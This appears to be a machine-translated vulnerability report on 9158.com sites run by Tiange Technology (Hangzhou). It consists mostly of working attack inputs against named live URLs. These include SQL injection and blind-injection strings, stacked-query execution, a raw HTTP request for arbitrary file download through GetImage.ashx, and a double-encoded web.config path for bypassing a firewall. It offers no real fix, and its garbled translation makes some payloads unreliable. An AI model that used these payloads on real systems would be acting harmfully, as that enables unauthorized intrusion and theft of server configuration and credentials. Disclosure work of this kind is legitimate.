9158 tiange Technology (Hangzhou) security issues

Some security problems of tiange Technology (Hangzhou) in 9158 include multiple SQL injections, arbitrary file downloads, and firewall bypass. Details: 1. injection 1 http://ok.9158.com/musiclist.aspx?musictype=1&searchType=1 ', 1, 1 -- & searchKey = http://ok.9158.com/musiclist.aspx?musictype=1&searchType=1 ',; Select -- & searchKey = 2, injection 2 http://ok.9158.com/musiclist.aspx?musictype=1&searchType=1 & SearchKey = % E5 % AD % 99% E4 % BF % AA' http://ok.9158.com/musiclist.aspx?musictype=1&searchType=1 & SearchKey = % E5 % AD % 99% E4 % BF % AA % 27,1, -- same as injection, Direct Multiple-sentence execution 3. Blind Injection http://room.9158.com/ktv_new/in_ktvroom.aspx?serverid=66&userid=wangjing01 And 1 = 1 and ''= 'this blind note can be determined by yourself, enter the correct statement and wrong statement .. 4. Download GET/UserControls/GetImage. ashx from any file in the same substation? ImgUrl = ~ /UserControls/GetImage. ashx HTTP/1.1 Host: cssr.9158.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 14.0) Gecko/20100101 Firefox/14.0.1Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8Accept-Language: zh-cn, zh; q = 0.5 Connection: keep-aliveCookie: cache = vod use NC to submit (although there is a firewall, it can be bypassed by second encoding) for example :~ /Web. after the second encoding of config: % 25% 37% 45% 25% 32% 46% 25% 37% 37% 25% 36% 35% 25% 36% 32% 25% 32% 45% 25% 36% 33% 25% 36% 46% 25% 36% 45% 25% 36% 36% 25% 36% 39% 25% 36% 37

Solution: understand it!